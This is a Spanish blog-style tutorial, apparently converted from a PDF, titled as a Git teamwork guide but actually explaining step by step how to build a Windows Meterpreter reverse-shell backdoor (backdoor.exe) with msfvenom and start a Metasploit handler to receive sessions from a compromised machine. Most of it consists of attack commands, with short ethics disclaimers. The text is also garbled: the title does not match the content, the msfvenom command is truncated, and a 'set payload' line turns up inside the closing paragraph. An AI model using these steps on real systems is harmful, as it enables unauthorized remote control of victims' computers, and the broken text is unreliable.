Guía de Git Cómo trabajar en equipo en proyectos: Aprende a usar Git para controlar versiones, colaborar con otros desarrolladores y mantener tu código organizado.

Edison Achalma

Escuela Profesional de Economía, Universidad Nacional de San Cristóbal de Huamanga

1

1

1

1

2

2

Primer parrafo de abstrac

Palabras Claves: keyword1, keyword2

Tabla de contenidos

Introduction	
1	Creando y Ejecutando un Payload Malicioso con Metasploit: Una Guía Paso a Paso
2	Paso 1: Obtener la Dirección IP con ifconfig
3	Paso 2: Crear el Payload con msfvenom
4	Paso 3: Configurar el Handler en Metasploit
5	Paso 4: Configurar el Exploit Handler
6	Paso 5: Ejecutar el Handler
7	Conclusión
8	Publicaciones Similares

D Edison Achalma

El autor no tiene conflictos de interés que revelar. Los roles de autor se clasificaron utilizando la taxonomía de roles de colaborador (CRediT; https://credit.niso.org/) de la siguiente manera: Edison Achalma: conceptualización, redacción

La correspondencia relativa a este artículo debe dirigirse a Edison Achalma, Email: elmer.achalma.09@unsch.edu.pe

Guía de Git Cómo trabajar en equipo en proyectos

1 Creando y Ejecutando un Payload Malicioso con Metasploit: Una Guía Paso a Paso

Hola a todos! Hoy vamos a sumergirnos en el fascinante mundo de la seguridad informática y la creación de un payload malicioso usando Metasploit. Si bien esta guía es con fines educativos, es crucial recordar que utilizar estas herramientas para actividades maliciosas es ilegal y antiético. ¡Usémoslas para aprender y proteger!

2 Paso 1: Obtener la Dirección IP con ifconfig

Primero, necesitamos conocer nuestra dirección IP local para configurar el payload. Usamos el comando ifconfig para obtener esta información. Abre tu terminal y escribe:

ifconfig

Esto mostrará todas las interfaces de red y sus respectivas direcciones IP. Busca la IP de tu red local. En este ejemplo, supongamos que es 192.168.122.152.

3 Paso 2: Crear el Payload con msfvenom

Ahora que tenemos nuestra dirección IP, vamos a crear el payload. Usaremos msfvenom, una herramienta que viene con Metasploit para generar payloads maliciosos. Queremos crear un payload que permita un acceso remoto a una máquina con Windows. Usamos el siguiente comando:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=

Desglosamos el comando:

-p windows/x64/meterpreter/reverse_tcp:
 Especificamos el payload, que en este caso es un
 Meterpreter reverse TCP para Windows de 64
 bits.

2 ACHALMA

- LHOST=192.168.122.152: Establecemos nuestra dirección IP local como el host de escucha.
- LPORT=4444: Elegimos el puerto de escucha (puedes cambiarlo si es necesario).
- -f exe: Indicamos que el formato de salida debe ser un archivo ejecutable de Windows.
- -o backdoor.exe: Nombramos el archivo de salida backdoor.exe.
- -a x64: Especificamos la arquitectura del payload (64 bits).

4 Paso 3: Configurar el Handler en Metasploit

Una vez que tenemos nuestro payload, necesitamos configurar un handler en Metasploit para escuchar las conexiones entrantes. Iniciamos Metasploit con:

```
msfconsole -q
```

La opción -q es para iniciar Metasploit en modo silencioso.

Paso 4: Configurar el Exploit Handler

En la consola de Metasploit, seguimos estos pasos:

1. Seleccionar el handler:

```
msf6 > use exploit/multi/handler
```

Esto indica que usaremos el módulo handler para gestionar la conexión entrante.

2. Configurar el payload:

3. Establecer el LHOST y LPORT:

```
msf6 > set lhost 192.168.122.152
msf6 > set lport 4444
```

4. Verificar las opciones:

```
msf6 > show options
```

Esto muestra todas las opciones configuradas para asegurar que todo esté correcto.

6 Paso 5: Ejecutar el Handler

Finalmente, ejecutamos el handler para empezar a escuchar conexiones:

msf6 > run

Ahora, el handler está activo y esperando que alguien ejecute el backdoor.exe en su máquina. Cuando esto suceda, obtendrás una sesión de Meterpreter y podrás interactuar con la máquina comprometida.

7 Conclusión

Este proceso demuestra cómo se puede crear y manejar un payload malicioso usando Metasploit. Nuevamente, subrayo la importancia de utilizar este conocimiento de manera ética y legal, principalmente para probar y fortalecer la seguridad de sistemas. Siempre asegúrate de tener permiso para realizar estas pruebas.

Espero que hayas encontrado esta guía informativa y útil. ¡Hasta la próxima!

Publicaciones Similares

Si te interesó este artículo, te recomendamos que explores otros blogs y recursos relacionados que pueden msf6 > set payload windows/x64/meterpreter/rewenpliarttus conocimientos. Aquí te dejo algunas sugerencias:

1. 🔁 Ejecutando Payload

Esperamos que encuentres estas publicaciones igualmente interesantes y útiles. ¡Disfruta de la lectura!